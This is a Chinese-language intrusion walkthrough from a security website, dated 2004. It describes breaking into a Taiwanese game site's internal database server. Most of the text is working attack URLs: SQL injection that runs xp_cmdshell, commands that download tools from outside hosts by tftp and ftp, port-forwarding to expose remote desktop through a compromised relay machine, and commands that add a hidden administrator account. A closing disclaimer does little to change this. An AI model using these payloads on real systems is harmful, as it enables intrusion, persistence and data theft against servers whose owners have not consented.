首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
内网数据库服务器入侵实战
来源:vfocus.net 作者:vfocus 发布时间:2004-08-22  

内网数据库服务器入侵实战


前言:对付服务器在内网而且对外不开放端口的数据库服务器,除了反弹端口得到一个shell外,没别的好办法,Do all in cmd,太麻烦,不方便我们进一步渗透内网,以下通过一个站点说明我的办法。

目标:http://xx.tw,台湾最大的游戏综合网站,前期信息,web存在注入点,web服务器和数据库服务器不是同一个机器。连接数据库服务器的是sql的sa权限,用nbsi2看过,是在内网,而且数据库服务器对外不开端口,web服务器只开80端口映射,我们来看看数据库服务器能不能上网。

http://xx..tw/news-game.asp?ch_id=001&newsid=2215' create table [xl] ([xl1][varchar](255),[xl2][varchar](255))—
http://xx..tw/news-game.asp?ch_id=001&newsid=2215’ insert into xl(xl1) exec%20master.dbo.xp_cmdshell%20'ping 163.com'--

然后爆出xl1的内容,恩,这个内网的机器可以上网,一切都是这么幸运。开始传一个可以下载东西的程序过去先。是winegg的down.exe

http://xx..tw/news-game.asp?ch_id=001&newsid=2215 insert%20into%20xl(xl1) exec%20master.dbo.xp_cmdshell%20'tftp –I 211.78.39.64 get down.exe'--

用xp_dirtree看看,system32下没这个文件,xl1里边也显示超时不成功,换个tftp服务器测试,还是不成功,只有用ftp了:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo open 211.78.39.64 >345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo get down.exe >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo qui >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'ftp -s:345.txt'--

ok,成功。然后可以下载东西了,先下载个卡端口的fprt.exe,查看xl1,发现成功,看看他开了什么端口。

http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20master.dbo.xp_cmdshell%20'down.exe%20http://666w.com/tools/foprt.exe'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20master.dbo.xp_cmdshell%20'fport'--

开了3389,但是显然没对外网映射,怎么办呢?我们要把他映射出来,找到了yyc写的vIDC软件,这个软件分客户端和服务器端,服务器端idc.exe在肉鸡运行,使用默认8080端口,直接在肉鸡运行就ok。客户端vIDCc.exe、vIDCc.DLL,是图形界面的,不能用,我来修改一下,加个ini文件,让他按ini文件里的配置自动连接绑定端口,ok,用down.exe下载到入侵的服务器,运行就已经绑定了3389了,我们这里是把内网数据库服务器的3389端口,绑定到我的肉鸡的7778端口,在入侵的机器上添加管理员:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'vidcc.exe'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'net user xiaolu luaixue /add'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'net localgroup administrators xiaolu /add'--

Ok 登陆肉鸡的7778端口,如图:

进去后,就是数据库服务器了,扫了一下web服务器,web服务器开了几乎所有能开的端口包括139,然后,findpass,sniffer,等等,就看你的了。


后记:本文旨在为你提供一个新的入侵思路,请勿直接模仿,触犯法律请自行负责。此文章连同修改后的vidc软件已在黑客X档案2004第8期发布。




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·新型D.o.S(伪造TCP连接进行数据
·渗透国内某网络游戏服务器群记实
·ASP.NET虚拟主机安全隐患
·Sql注射总结(强烈推荐)
·演示从注册表中还原MSNMessenger
·小议溢出shell下的文件传送
·How to execute system command
·将连接数据库的代码隐藏在DLL中
·WDB论坛存在多个严重漏洞
·Mssql Backup a Shell 突破特殊
·SYMANTEC防火墙内核溢出漏洞利用
·Linux内核漏洞浅析
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved